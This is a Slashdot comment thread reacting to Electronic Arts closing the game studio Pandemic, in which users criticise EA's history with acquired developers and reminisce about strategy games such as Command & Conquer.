initialization. No sensein making assumptions that could be broken down the road, resultingin extra work for someone to debug. Unlikely, perhaps, but whoneeds the aggravation...Signed-off-by: Lee Schermerhorn <lee.schermerhorn@hp.com> mm/page_alloc.c | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-)Index: Linux/mm/page_alloc.c===================================================================--- Linux.orig/mm/page_alloc.c 2007-08-15 10:01:23.000000000 -0400+++ Linux/mm/page_alloc.c 2007-08-15 10:05:41.000000000 -0400@@ -52,7 +52,14 @@ */ nodemask_t node_states[NR_NODE_STATES] __read_mostly = { [N_POSSIBLE] = NODE_MASK_ALL,- [N_ONLINE] = { { [0] = 1UL } }+ [N_ONLINE] = { { [0] = 1UL } },+#ifndef CONFIG_NUMA+ [N_NORMAL_MEMORY] = { { [0] = 1UL } },+#ifdef CONFIG_HIGHMEM+ [N_HIGH_MEMORY] = { { [0] = 1UL } },+#endif+ [N_CPU] = { { [0] = 1UL } },+#endif /* NUMA */ }; EXPORT_SYMBOL(node_states); -To unsubscribe from this list: send the line "unsubscribe linux-kernel" inthe body of a message to majordomo@vger.kernel.orgMore majordomo info at read the FAQ at
|
https://lkml.org/lkml/2007/8/15/222
|
CC-MAIN-2017-43
|
refinedweb
| 896
| 66.84
|
It looks like you're new here. If you want to get involved, click one of these buttons!Sign In
It looks like you're new here. If you want to get involved, click one of these buttons!
Hello,
I am trying to run facenet (Inception Resnet V1 on movidius). Please point me towards any tutorial as to how to start compiling for tensorflow. I tried mvCCompile on mnist softmax.py example from the tensorflow website and got the following error. Please help. I am also attaching the softmax.py which I used to create a frozen graph.
mvNCCompile mnist_output/mnist_default.meta -in=input -s12 -o=mnist_graph -on=output mvNCCompile v02.00, Copyright @ Movidius Ltd 2016 /usr/local/lib/python3.5/dist-packages/tensorflow/python/util/tf_inspect.py:45: DeprecationWarning: inspect.getargspec() is deprecated, use inspect.signature() instead if d.decorator_argspec is not None), _inspect.getargspec(target)) [Error 34] Setup Error: Values for input contain placeholder. Pass an absolute value.
softmax.py code below:
from __future__ import absolute_import from __future__ import division from __future__ import print_function import argparse import sys import tempfile from tensorflow.examples.tutorials.mnist import input_data import tensorflow as tf FLAGS = None def deepnn(x): """deepnn builds the graph for a deep net for classifying digits. Args: x: an input tensor with the dimensions (N_examples, 784), where 784 is the number of pixels in a standard MNIST image. Returns: A tuple (y, keep_prob). y is a tensor of shape (N_examples, 10), with values equal to the logits of classifying the digit into one of 10 classes (the digits 0-9). keep_prob is a scalar placeholder for the probability of dropout. """ # Reshape to use within a convolutional neural net. # Last dimension is for "features" - there is only one here, since images are # grayscale -- it would be 3 for an RGB image, 4 for RGBA, etc. with tf.name_scope('reshape'): x_image = tf.reshape(x, [-1, 28, 28, 1]) # First convolutional layer - maps one grayscale image to 32 feature maps. with tf.name_scope('conv1'): W_conv1 = weight_variable([5, 5, 1, 32]) b_conv1 = bias_variable([32]) h_conv1 = tf.nn.relu(conv2d(x_image, W_conv1) + b_conv1) # Pooling layer - downsamples by 2X. with tf.name_scope('pool1'): h_pool1 = max_pool_2x2(h_conv1) # Second convolutional layer -- maps 32 feature maps to 64. with tf.name_scope('conv2'): W_conv2 = weight_variable([5, 5, 32, 64]) b_conv2 = bias_variable([64]) h_conv2 = tf.nn.relu(conv2d(h_pool1, W_conv2) + b_conv2) # Second pooling layer. with tf.name_scope('pool2'): h_pool2 = max_pool_2x2(h_conv2) # Fully connected layer 1 -- after 2 round of downsampling, our 28x28 image # is down to 7x7x64 feature maps -- maps this to 1024 features. with tf.name_scope('fc - controls the complexity of the model, prevents co-adaptation of # features. with tf.name_scope('dropout'): keep_prob = tf.placeholder(tf.float32) h_fc1_drop = tf.nn.dropout(h_fc1, keep_prob) # Map the 1024 features to 10 classes, one for each digit with tf.name_scope('fc2'): W_fc2 = weight_variable([1024, 10]) b_fc2 = bias_variable([10]) y_conv = tf.matmul(h_fc1_drop, W_fc2) + b_fc2 return y_conv, keep_prob def conv2d(x, W): """conv2d returns a 2d convolution layer with full stride.""" return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME') def max_pool_2x2(x): """max_pool_2x2 downsamples a feature map by 2X.""" return tf.nn.max_pool(x, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME') def weight_variable(shape): """weight_variable generates a weight variable of a given shape.""" initial = tf.truncated_normal(shape, stddev=0.1) return tf.Variable(initial) def bias_variable(shape): """bias_variable generates a bias variable of a given shape.""" initial = tf.constant(0.1, shape=shape) return tf.Variable(initial) def main(_): # Import data mnist = input_data.read_data_sets(FLAGS.data_dir, one_hot=True) # Create the model x = tf.placeholder(tf.float32, [None, 784], name ="input") # Define loss and optimizer y_ = tf.placeholder(tf.float32, [None, 10], name = "output") # Build the graph for the deep net y_conv, keep_prob =()) with tf.Session() as sess: sess.run(tf.global_variables_initializer())}) saver = tf.train.Saver(tf.global_variables()) saver.save(sess, "mnist_output/"+'mnist_default') print('test accuracy %g' % accuracy.eval(feed_dict={ x: mnist.test.images, y_: mnist.test.labels, keep_prob: 1.0})))
Please don't start the tutorial/explanation from tensorflow slim module. Start from reading/loading the check point file.
@aboggaram we are writing an article about this, and I expect to publish it sometime next week, will let you know as soon as it goes LIVE.
@AshwinVijayakumar : Where exactly is the example for custom tensor flow network in the blog? I am having a custom object detection tensor flow .meta file. I want to run that on Movidius neural stick.
I am using following command:
mvNCCompile -s 12 models/model.meta -in=input_1 -on=conv2_1/bias
and I am getting the following error:
[Error 34] Setup Error: Values for input contain placeholder. Pass an absolute value.
I also look forward to the blog post. Any update on how to compile a tf network using mvNCCompile is highly appreciated as well.
@ramana.rachakonda I have gone through that tutorial and followed the exact same steps but still ending up with the error given mnist example. The documentation given here is not sufficient. @AshwinVijayakumar and Intel team, can you please provide a solid example to compile a custom network rather than those from the tf.contrib.slim module? Thanks a lot,
Achyut
+1
AshwinVijayakumar ,
any news regarding this question? I would also very much like an answer.
Also waiting for this workflow for converting a custom-trained tensorflow model into Movidius graph. My understanding is that the example script that is provided in works for the case of creating a model, with an image tensor placeholder input and final output layer that are compatible with movidius. The model is then initialized with variables from a checkpoint and re-saved, so it can be recompiled with mvNCCompile. But when using a model that was already custom-trained from a checkpoint e.g. the model zoo downloads, there does not seem to be a one-to-one mapping of the original model variables, and variable scoping has some extra prefixes that are not correctly mapped if using init_from_checkpoint(). So it would be nice to see a clear example of how to go from a tensorflow frozen graph to a movidius graph. Thanks.
the only i check into the forum now is to see if there has been an update on this topic
I have been trying to get a Tensorflow ENet segmentation model to work on the NCS, but I keep running into issues such as '[Error 5] Toolkit Error: Stage Details Not Supported: RealDiv'. Is there any comprehensive list of supported tensorflow operations somewhere?
So far, I have had similar errors with the following operations(tf.*):
* div (elemwise division => RealDiv)
* abs
* log
* pow
* greater
* reciprocal
* gather_nd
Also a weird error where broadcasting did not work and I had to use tf.expand_dims() before multiplying alpha for PReLU layer.
The [Error 5] is preventing me from doing division (tf.div() becomes RealDiv), which breaks Spatial Dropout . Adding support for some of the basic math operations listed would be really nice.
I might start a new thread after looking around some more if nobody here has a list which ops are supported. Also, how do we make feature requests?
Edit: I updated to version 11, and the div/RealDiv issue seems to have been addressed. I still have not tested other operations, so my question of a list still stands.
@sjbozzo, if you are trying to get MNIST running on NCS, check out this example:
MNIST example:
Please look at this page especially the section "Save Session with graph and checkpoint information".
Looks like you need to do something like this to save the session with specific values for input placeholders such as image size etc.
@aboggaram ,
i am also getting same error, please let me know if you find the solution.
my detail question is here
@Tome_at_Intel Please help me here. Thanks
Awesome, thanks so much!
@AshwinVijayakumar When can we expect the article?
Waiting for it too!
Similarly interested in this article.
Also waiting for this..
I'm very interested in this topic,too.
Hi everyone, I am running a little behind on putting this article together. I was tied up putting the first 2 articles on, please watch out for the tensorflow article on this blog site.
Will you be at CES if so whats the booth number?
@AshwinVijayakumar i am wondering about multiple feature support, it can be built by us somehow or overcome this?
@chicagobob123 , We will be at the Intel NTG, Movidius Group booth -
@GoldenWings, not sure I understand. Can you please clarify what you mean by 'multiple feature support'?
@AshwinVijayakumar i mean multiple input currently the sdk supports single input i was wondering if there is away to ocercome this
Also waiting for this.
So, what I have to do is train the network and save the graph, then run the movidius compiler that generates a new graph in the ncs format and finally use the API to evaluate an input data ?.
The last post was on November 21, has a new tutorial or documentation of how to train your own network been published? For example MNIST?
waiting for this.
Waiting for it too!
|
https://ncsforum.movidius.com/discussion/339/is-there-a-tutorial-or-documentation-for-running-custom-tensorflow-network-in-movidius
|
CC-MAIN-2018-17
|
refinedweb
| 1,525
| 50.53
|
Despite the Mac works beautifully. You also need to make sure to change the namespace in your
appname-app.xml file:
<?xml version="1.0" encoding="UTF-8"?> <application xmlns="">
Catching the “ESC” Key in Full Screen Mode
Now you’re ready to go. One oft-requested feature for AIR (and Flash Player) is the ability to capture the “escape” key and not have it exit full screen mode. With AIR 1.5.2 this is easy. You set an event handler for the
keyDown event and then inside of the event handler you call
event.preventDefault(). Here’s a quick example:
<?xml version="1.0" encoding="utf-8"?> <s:WindowedApplication xmlns: <fx:Script> <![CDATA[ protected function btn_fullScreen_clickHandler(event:MouseEvent):void { stage.displayState = StageDisplayState.FULL_SCREEN_INTERACTIVE; btn_fullScreen. </s:WindowedApplication>
Once you call the
event.preventDefault() method you can use the Escape
keyCode like any other key.
Garbage Collection of XML Data
Another one that will be huge for performance optimization is the ability to mark an XML object for immediate garbage collection. To do this you can use the new
System.disposeXML(xml:XML) method. Oliver Goldman gave me a great explanation of what’s happening.
Even then, the disposeXML() call doesn’t immediately dispose of the XML. The XML object is backed by a graph of objects with parent/child pointers between them. Those pointers make it difficult for the GC to collect all of those objects. The disposeXML() call traverses the graph, setting all of those pointers to null, and making it much easier for collection to occur. The objects still aren’t collected right away, however—that’s still pending on the GC activity.
To use the new API you just have to call the method and then null out your XML variable. That will make it easier for the garbage collector to clean up. In the example below I load in a big XML file, do some parsing to it so that it loads into memory, then call the
System.disposeXML() method.
public var xml:XML; protected function windowedapplication1_creationCompleteHandler(event:FlexEvent):void { var file:File = File.applicationDirectory.resolvePath("assets/Untitled.gpx"); var stream:FileStream = new FileStream(); stream.open(file,FileMode.READ); var str:String = stream.readUTFBytes(file.size); stream.close(); xml = new XML(str); } protected function btn_loadXML_clickHandler(event:MouseEvent):void { xml.normalize(); var xmlList:XMLList = xml.children(); var text:XMLList = xml.text(); var xmlStr:String = xml.toString(); } protected function btn_disposeXML_clickHandler(event:MouseEvent):void { System.disposeXML( xml ); xml = null; }
Memory Profiler using the disposeXML() method
You can see how this behaves in the profiler screenshot above. If you want to immediately garbage collect you can call
System.gc() but if you use this often it can have negative performance implications (thanks to Ethan for the tip).
The last one I wanted to touch on was a new, friendlier install screen as blogged about by Joseph Labrecque and Oliver Goldman. We got rid of the “System Access: Unrestricted” for signed applications so that if you sign your app your end users will have a nicer install experience.
Adobe AIR 1.5.2 Signed App Install Screen
Those are three of the biggies. You can download the sample project here if you want to run the full screen example and the
System.disposeXML() example.
|
http://blogs.adobe.com/digitalmedia/tag/garbage-collection/
|
CC-MAIN-2014-35
|
refinedweb
| 544
| 59.19
|
Recently, I’ve been investing quite a lot in learning ReScript and TBH I’m pretty much dead as JS developer right now because I’ve seen the better world. Much better one.
As a part of “Selling ReScript to my colleagues” campaign (and to anyone, really), I’m going to spam your feeds from time to time with ReScript.
Let’s say you created new file
Math.res. Boom, you have a new module in your app called
Math.
math.resbut module name is still capitalized:
Math.
If you create a type or a function or whatever inside your module it’s automatically available for module’s consumers using dot notation.
rescript
let sum = (a, b) => a + b// Now you can use `Math.sum` in another module
Let’s say you created file
App.res and want to use
sum function from
Math. How can you import it? The answer is “You don’t need to!”. All your root modules are available everywhere in your app. You can use any of them once you need it without messing with imports.
rescript
let onePlusTwo = Math.sum(1, 2)
Imagine when you implement some UI where you need
Button,
Input,
Link etc etc: every time you need a new component in JS you have to go up, import it, go back to where you were. With ReScript, you can just use whatever you want right here right now without interrupting your flow. So good! Once you’ll start using it, you’ll get how brilliant this is.
Of course, you can use folders to group your files as you usually do,js
export default AuthButton extends React.Component {}
LoginForm.jsjs
import Button from "./LoginButton";
What a mess! If you ever decide to rename your component you have to change all these places to keep your naming accurate. Meh. In ReScript world, you have only one source of truth: file name. So it’s always guaranteed accurate across the entire app.
More about the ReScript modules in the official documentation.
|
https://alexfedoseev.com/blog/dev/2018/rescript-modules
|
CC-MAIN-2021-25
|
refinedweb
| 338
| 75.5
|
pinax-theme-foundation 0.2a1
Pinax theme based on Zurb's Foundation
A Foundation 3 Theme for Pinax
==================================`_.
.. _Zurb Foundation:
.. _article:
Contributors
-------------
* `Christopher Clarke <https: github.`_
* `Kewsi Aguillera <https: github.`_
* `Lendl R Smith <https: github.`_
What's New
------------
- This release supports Foundation 3.1 which includes features such as
right-to-left language support, new UI Styles for Progress Bars
and Image Thumbs, updated jQuery and so on, read more about 3.1
`here <http: foundation.zurb.`_
- Fully utilize the Foundation 3.1 responsive Top
Navigation bar rather than our home grown solution
- Included Icon Fonts, Responsive Tables and SVG Social Icons
Zurb add-ons which are not part of core release
- Lay the groundwork for supporting the `--template`
flag on the `django-admin.py start project` in the next release
Quickstart
-----------
Create a virtual environment for your project and activate it::
$ virtualenv mysite-env
$ source mysite-env/bin/activate
(mysite-env)$
Next install Pinax::
(mysite-env)$ pip install Pinax
Once Pinax is installed use **pinax-admin** to create a project for your site
::
(mysite-env)$ pinax-admin setup_project mysite -b basic mysite
The example above will create a starter Django project in the mysite folder based on the Pinax **basic** project.
Of course you can use any of the Pinax starter Projects.
The **basic** project provides features such as account management, user profiles and notifications.
The starter project also comes with a **theme** or a collection css, javascript files.
The default theme is based on Twitter Bootstrap.
To use the **Foundation** theme in the project, include "pinax-theme-foundation" in requirements/project.txt.
Either install the package individually. ::
pip install pinax-theme-foundation
Or use the requirements file::
pip install -r requirements/project.txt
Next edit the **settings.py** file and
comment out the entry for "pinax_theme_bootstrap" and add "pinax_theme_foundation" in your INSTALLED APPS::
# theme
#"pinax_theme_bootstrap",
"pinax_theme_foundation",
Inside your project run::
(mysite-env)$ python manage.py syncdb
(mysite-env)$ python manage.py runserver
Templates
^^^^^^^^^^
The Pinax *setup_project* creates a *site_base.html* template which extends *theme_base.html*.
You own templates should normally inherit from *site_base.html*. However, due to
inconsistencies between Bootstrap and Foundation you may need to perform an additional step
to ensure that the top nav bar is styled properly.
If have created a **basic** starter project
edit the generated *site_base.html* to remove the extra
*ul* tags found in the *{% nav block %}*. In the *basic* project *{% nav block %}* contains profile and notices dropdown menu items.
The project *site_base.html* will contain ::
{% block nav %}
{% if user.is_authenticated %}
<ul>{% spaceless %}
<li id="tab_profile"><a href="{% url profile_detail user.username %}">{% trans "Profile" %}</a></li>
<li id="tab_notices"><a href="{% url notification_notices %}">{% trans "Notices" %}{% if notice_unseen_count %} ({{ notice_unseen_count }}){% endif %}</a></li>
{% endspaceless %}
</ul>
{% endif %}
{% endblock %}
Remove the *ul* tags so the block looks like ::
{% block nav %}
{% if user.is_authenticated %}
<li id="tab_profile"><a href="{% url profile_detail user.username %}">{% trans "Profile" %}</a></li>
<li id="tab_notices"><a href="{% url notification_notices %}">{% trans "Notices" %}{% if notice_unseen_count %} ({{ notice_unseen_count }}){% endif %}</a></li>
{% endif %}
% endblock %}
You should provide your own "footer" template _footer.html
Also change the Site name by editing *fixture/initial_data.json* you can also use the Admin app for this purpose.
The **url** name "home" should be defined as the homepage.
Upgrading Previous Version
---------------------------------------------
To upgrade you have <http: foundation.zurb.`_
Remove all **max-width** from css sytling
.. end-here
Documentation
--------------
See the `full documentation`_ for more details.
.. _full documentation:
.. _Pinax:
- Author: Chris Clarke
- License: MIT
- Categories
- Package Index Owner: chrisdev
- DOAP record: pinax-theme-foundation-0.2a1.xml
|
https://pypi.python.org/pypi/pinax-theme-foundation/0.2a1
|
CC-MAIN-2016-40
|
refinedweb
| 591
| 58.38
|
I am currently working on a project where I need my model to have an avatar. I am using Python 3 and Django for this project. The thing is, I needed some data for this project. So I decided to create a script that will read the data from Wikipedia’s API and save it in my database.
I am currently using django-imagekit to handle the image processing for my model’s avatar. My model looks something like this:
from django.db import models from imagekit.models import ImageSpecField from imagekit.processors import ResizeToFill class Person(models.Model): avatar = models.ImageField(upload_to='avatars', default='') avatar_thumbnail = ImageSpecField(source='avatar', processors=[ResizeToFill(300, 200)], format='JPEG', options={'quality': 80})
With Wikipedia’s API, I can somehow get the image URL for the article I’m looking for. My problem was how would I be able to save the image from the image URL. It took me a while to do this. The closest I found was this answer from Stackoverflow. I had to modify it because I am using Python 3 in my project.
from django.core.files.base import ContentFile from io import BytesIO from urllib.request import urlopen input_file = BytesIO(urlopen(img_url).read()) # img_url is simply the image URL person = Person.objects.create() person.avatar.save("image.jpg", ContentFile(input_file.getvalue()), save=False) person.save()
I streamed the image using the builtin
BytesIO object in Python 3 and put it onto Django’s
ContentFile before finally saving it in the Person object.
This worked well for me. I am not sure whether there’s a better way of doing this but if there is, I would love to know!
|
http://paoloibarra.com/2015/11/29/Saving-Image-from-URL-to-Django-Imagekit-Python3/
|
CC-MAIN-2018-39
|
refinedweb
| 280
| 60.31
|
>>."
Hmmmm. (Score:2)
Re: (Score:2)
I can't imagine there's a ton of VC floating around right now, and even less so for folks coming out of an unsuccessful (as of late) studio.
Not to say that has anything to do with the developers, mind you.
Re: (Score:2)
Re: (Score:2)
There is VC to be had, but not for video game developers. Most of it is going to web startups, places with lower cost to fund (2-5 guys salary, rather than 25+) and the potential to make a massive return (valuations in the 10s or 100s or millions of dollars). Indie gaming just isn't as safe of an investment or have the potential of such high returns.
EA : (Score:2)
EA destroys and corrupts whatever it touches. A developer being bought by EA is the kiss of death
But I thought that they bring out the whips and chains first??
Re: (Score:2)
I agree. The C&C series are what made me love RTS type games. C&C, Red Alert etc and the classics of a game studio who just do it right. Sadly, that was killed by EA and nobody has really stepped up to fill the gap
:(
Re:EA (Score:5, Interesting)
In particular co-op RTSs seem to be non-existent and most that do support it seem like it was added at the last moment on a whim. If you're interested in a game that has more focus on the S part of RTS, and excellent co-op opportunities, i recommend AI War: Fleet Command [arcengames.com]. It's an indy game written by a developer who actually cares about it's playerbase(No i'm not that developer, but I do play the game), and makes free DLC available almost every week with bug fixes, gameplay improvements, new units, etc. The gameplay is very asymmetrical. The enemy has already taken over the galaxy and is now distracted with other pursuits. The more planets you capture and the more structures you destroy the more annoyed the enemy becomes, sending larger and more powerful fleets against you. You can't go recklessly taking over every planet you encounter because the enemy would soon be mighty pissed and send everything it has against you.
It's not for everyone, however you should at least check it out if you're finding the RTS platform has been lacking as of late.
Re: (Score:2)
The dev of that game lurks around
/. too.
Re: (Score:2)
Re:EA (Score:4, Insightful)
One word:
BULLFROG.
Re:EA (Score:5, Insightful)
I wonder what will happen to their next game, The Saboteur, which is due out in 3 weeks. It is worth noting that they have no other projects announced recently, perhaps this was long on the horizon.
Re: (Score:2)
For the most part the game is done. Any necessary patches, etc. are being handled by the 25.
Re: (Score:1)
Besides, the TFA (second link) clearly points the finger at Pandemic's internal management, rather than EA.
Re: (Score:2)
I do. I'm hoping they could "reform" and be out from EA's thumb. Great company, and being bought up by EA was the worst thing that could happen.
Unfortunately if this happens, they loose much of the IP I would really consider to be theirs in the first place.
Re: :4, Interesting)
What's interesting is that Bioware merged with Pandemic before being bought by EA. Seemed odd that an RPG developer would get together with an FPS developer like that. Also seems strange that if Pandemic was so poorly managed as indicated in other comments that an amazingly well-run company like Bioware would merge with it. Another oddity here is that Riticello, the current CEO of EA, was one of the people who orchestrated with Bioware/Pandemic merger before EA acquired them and he became CEO.
Given all these facts the closure of Pandemic could be a deep betrayal or someone getting their freedom after a big payout. Ah, the world of game business.
At any rate, I keep reminding people that Bioware is now owned by EA. Other studios manage to put out a few good games before they're killed off by EA, too. So, keep hoping the streak lasts.
Re: sha
Re: (Score:3)
Yup...I miss the old Westwood so much. Command & Conquer was such a great series before EA got their hands on it. I was actually recently playing over the original again after downloading it from an abandonware site*, and it's still far better than most of the recent ones. Generals isn't bad, though the whole 'generals abilities' thing and unlimited cashflow buildings take a lot out of the game. But C&C3 and RA3 are both complete garbage. Such a huge loss...
I still remember playing on...what the hel
Re: (Score:2)
I keep hearing "RA3 and TW are so horrible!" but nobody ever states a good reason. Is it because they're so polished? Having "big name" actors in the cutscenes? What is it?
I've been playing C&C games since Tiberian Sun, and I like Tiberium Wars and Red Alert 3 better than the previous games. Plus, come on, Tim Curry! TIM CURRY!
Re: (Score:2)
The balance for one. They're too easy. I beat TW in under a week. Yet I've played the original countless times and I still don't think I've ever actually beaten it without taking advantage of game bugs ('sandbag trick' anyone?). It's actually a _challenge_. TW and RA3 are just a grind. Sure, the missions had a bit more depth to them - a few more objectives and larger enemy bases, but in the end it all boiled down to building a shitload of one unit and storming the enemy with it. What fun is that? That shit
Re: (Score:2)
Interestingly one of my pet peeves with the original C&C as well as most RTS games is that they are way too easy for about 80% of the game and painfully hard for the remaining 20%, nothing like getting stuck halfway through a game because you just can't get past some ridiculously hard level (bonus points if it's one of those C&C trademark "fuck this strategy shit, let's just give the player two engineers and a commando" levels that are basically squad tactics and involve no large-scale strategy what
Re: (Score:2)
Joke aside, I've yet to find strategy games that are actually balanced and fun. Total Annihilation came close, and is one of my all ever favorites. Still I'd like some strategy game which is based on what a war could actually be.
Most of the mission on every RST out there could be lose by the player in the first two seconds if the AI was truly playing a competitive game. I mean, i
Re: (Score:3, Interesting)
Re: (Score:2)
I think that the problem may be that most rts focus on the battle phase of war, which coincidentally is also the less meaningful. as they say it's the planning that win the war, not the actual skirmishes, while europa universalis ditch i
Re: (Score:3, Interesting)
That's a bit trite. Given the vast tech tree and weapon-vs-target modifiers in Warzone 2100, "most powerful" is largely subjective. What's more "powerful", super-heavy tracked bodies with heavy cannons, packs of light-bodied VTOLS with tank-killer missiles, or swarms of cyborgs with lasers? And how about the decision whether to build mobile units, or to go hog wild on building long ranged fixed artillery and the
Re: (Score:2)
Re: (Score:2)
and even better even the players of the PC version freely admit that the PSone port (simultaenous release on both platforms believe it or not) is the exact same game, running at lower resolution. It's 3D so it runs better on the PSone than the C&C ports do and you can have your units behave intelligently, like returning for repair when they get heavily damaged. It also supports the PSone mouse with UI changes if you plug it in. The briefing lady's voice is VERY familiar to SOCOM players.
Re: (Score:1)
If you liked TA, give Supreme Commander a try... some really innovative game play mechanics were introduced.
(SupCom was created by the same guy(s) that created TA)
SupCom 2 is supposedly coming out soon, and as a bonus will be able to run on a 360. (meaning that a dual core should easily be able to churn out a good 2000+ unit battle)
Re: (Score:2)
What I meant was that most games that are called Realtime Strategy are actually Realtime Tactics.
/Mikae
Re: (Score:2)
I've been playing C&C games since Tiberian Sun, and I like Tiberium Wars and Red Alert 3 better than the previous games.
You're not going back far enough.
As someone who has played C&C since the original, Tiberian Sun was the worst of the first four games (C&C 1 and 2, RA 1 and 2), so it's not surprising that you might think the new games are better. But you'd be wrong... the other three games are terrific. The feel of C&C1 and RA1 have never been surpassed. I still play RA2, which is also great fun.
Re: (Score:2)
Okay, I confess I 3 all three of the Red Alert series.
Re: (Score:2)
Less than three, that is.
Re: : (Score:2)
Yep. In recent times also Mercenairies 2 was one of the best coop games I've ever played, if not the best, the free world with so many vehicles and toys to play with just opened so many doors to play around- just doing fun stuff like sticking the cruise missile target beacon onto the side of your friends helicopter and watch him fly around with a cruise missile chasing him was pretty funny. Attacking the enemy base by stealing a large enemy helicopter then slowly dismantling their base by airlifting all the
Re: : (Score:2)
Westwood
...
Mythic
Bullfrog
Origin
anymore?
Re: (Score:2)
Maxis to some degree...
Re: f
Re: (Score:2)
Problem is as long as millions buy the same sports game year after year EA wont be gone for good...
People have voted with their wallet and that is they shove EA for the same game over and over again millions into their throat every year.
Re: (Score:2)
Another good example is Bullfrog. After being “aquired”, every single one quit its job, and they founded a new company. Then when that company got bought by EA too, again 60% quit on the spot.
That says something about how much EA is ‘loved’.
I know two ex-EA developers. They both are basically alcoholics now, because of it.
If you are there, you are basically a slave code monkey. Their whole process of game development is from its innermost core designed to kill off all creative life.
Re: (Score:2)
If the people selling it had given a damn they'd have had a poison pill provision to protect their people. Since EA is a known evil the sellouts are wholly to blame.
The 25 employees who remain ... (Score:3, Informative)
Obligitory (Score:2)
So EA wanted to drop the hammer on a pandemic (Score:1)
Re: (Score:2)
Unfortunately, it seemed like they may have actually been getting better as they made more games...
Re:They are NOT hurting for funding (Score:4, Insightful)
Re: (Score:2)
To be fair, there is very little evidence that EA could, in fact, improve their bottom line by steadily generating quality product. Since they've never managed to steadily generate quality product, we'll never know.
actually EA changed quite a lot in the past few years, take a look at need for speed for example, they were making the same shit every year, this year they changed the developer team and they probably made the best racing game ever, second only to gran turismo. They also produced other great games made by DICE(mirror's edge, battlefield) or BioWare(mass effect, dragon age)
now take a look at activision, they fucked up pc players with no dedicated servers, if that wasn't enough they asked steam to ban/rev
Re: (Score:2, Interesting)
Shift was a crap game. They released it half-finished, car selection sucks, engine and car tuning is SOOOOO generic, suspension tuning is all bugged out, opposite-lock not required (all cars seem to magically neutral-drift through all corners). I could go on and on. To even suggest that Shift be put anywhere near Gran Turismo or Forza is laughable.
I will admit I really like the direction they took the series and the game sounded GREAT but I think we'll have to wait for Shift 2 or 3 before they've found t
Re: (Score:2).
Blizzard... but they are the major exception to the rule (the Pixar of games?)
Other than that I agree completely about the 'global economy' bs. Not every job is 'cog' job despite management's wet dream fantasies to make it so....
Re: (Score:1, Troll)
Re: (Score:2)
Blizzard is more than the WoW MMOG crack market that is their most recent creation... Starcraft, Diablo, Warcraft etc...
Re: (Score:2)
Blizzard is more than the WoW MMOG crack market that is their most recent creation... Starcraft, Diablo, Warcraft etc...
True enough, but those other franchises haven't had games released in years. I'm looking forward to that changing. Oh Diablo III, you can't get released soon enough.
Re: (Score:1, Funny)
Re: (Score:2)
If only someone knew what that "NASCAR" acronym meant!
Re: (Score:2)
Re: (Score:2)
Re: (Score:2)
They and Bioware only have their freedom as long as every game sells well, as soon as they produce even one stinker, they are screwed.
Happened in the past as well, in case of Origin it was even worse, EA started to talk itself into the decisions even before the first game under their umbrella was released, they did not stand a chance in the first place.
Blizzard is in the same position at Activision as Bioware is in EA, as long as they meet the expectations they have a more or less free reign (although I sti.
Sustainability? (Score:2)
Is this model sustainable? With the number of expansions, absorbed companies and conquest, it looks like EA is turning into the GM of gaming. they may be healthy now but what about in a year? 5 years? 10 years? It's like cutting off your pinky to lose weight. It's gone, and never coming back.
Re: (Score:1)
Also, a Spore movie [kotaku.com]. And I think they're making one for Dead Space and maybe The Sims.
Re: (Score:2)
Don't forget they are also firing the ENTIRE current C&C team [kotaku.com] so they can bring in some guy who is gonna "transform Command and Conquer with a new digital model that is going to re-ignite the fan base for this franchise."
Damn, does this company LOVE the buzzword bingo or what? WTF is a "new digital model"? I'm shocked someone didn't throw synergy in there while they were at it. They are also bringing in somebody to "reinvent" the MOH series, so expect that to suck some major balls as well. Its sad that
Re: (Score:2)
Game publishers spend huge amounts on marketing. Opening a couple of storefronts for a couple of months doesn't even make a dent in their budget. The total cost of this stunt would have covered the salary of one or two programmers for a year, tops.
Which is not to say that this was a good marketing ploy. Indeed, it strikes me as pretty dumb. But it's hardly proof that EA is rolling in cash.
Damn it, EA... (Score:1)
I'll then bankroll a proper Wing Commander game since you people don't seem interested in doing it.: (Score:2)
The galling part is that EA will rush to a fire sale and gobble up any IP they can get their hands on and then go out and produce 5 or 6 new series that are similar to the IPs that they just threw hundreds of thousands at. Its like someone there confused patent with trademark.
Re: (Score:2)
The bad thing is, all the yearly sports titles keep EA afloat without them they would have folded a long time ago, but there are literally millions out there in the world who will buy the same game every year on and on just for the updated statistics.
Thanks to those idiots we have to live with EA and thanks to the idiots buying the next incarnation of guitar hero every year, Activision, once a very good publisher pulls the same stunt as EA.
EA tried to break out of that cycle recently, because they know, the
Re: (Score:2)
Wing Commander 4 and Ultima 8 already were developed fully under EA influence, so go figure...
Wing Commander 4 sucked, Ultima 8 while not bad per se was branded as Super Mario Avatar!
Re: t
Re: (Score:3, Interesting)
Tried to play the SNES version one day, it was not that bad it mostly was a 1:1 port of the PC version, Wing Commander 1 was a very basic game to begin with limited by the machines of that time. Wing Commander 2 was the one which gave the series its good name and Wing Commander 3 was the one which made it famous. (And Wing 4 killed it thanks to EAs heavy influence which you can contribute to everything which sucked at part 4)
Re: (Score:2)
Long time, but I do not remember it that way. WC4 was my favourite since it had a solid plot with a few twists, compared to WC3 where Chris Roberts was still experimenting and used the classic evil-aliens-we-must-exterminate plot. For some part of WC4 you could actually choose sides (though the plot had to converge at some point).
What really killed the series was WC5. Bad acting, bad plot, no details ever given about the enemies, gameplay not significantly improved.
Re: (Score:2)
Urgs sorry, I mixed it up, yes Prophecy was the game which took the series down, the first WC where EA had full control because Roberts had gone and people from EA replaced him and his team.
I forgot about the real 4, price of freedom.
Re: (Score:2)
Huh. I was expecting an Ultima whine.
Move along nothing to see (Score:2)
I've lost count of how many studios EA has chewed up and spit out.
This isn't news, it's just more of the same.
Re: (Score:2)
Next ones Bioware... they already are bought, I am just waiting for the first game they did not earn their exepectations, that will be the time EAs screw everything up management will take over and after that we probably will see a Baldurs Gate shooter or Dragon Age Football on a yearly basis and after a while it will be shut down.
Re: (Score:2)
What's worse is it'll be EA's management that causes them to release something half baked and soulless.
Gamasutra job listings (Score:2)
I assume one of the bad management decisions was seemingly spending all their money on Gamasutra job postings? When I was looking around for a new job a couple of years ago it seemed like every other posting was for a position at Pandemic. co
Conflict of interest? (Score:4, Interesting)
The interesting part of this is that the CEO had EA purchase his old company for a high amount of $$$ and only two years later shut it down while he personally pocketed several million. [escapistmagazine.com]
Re: (Score:2)
Bioware also was in his assets, and he sold it off to EA while pocketing the money...
Not sure if this is not insider trading.: (Score:2)
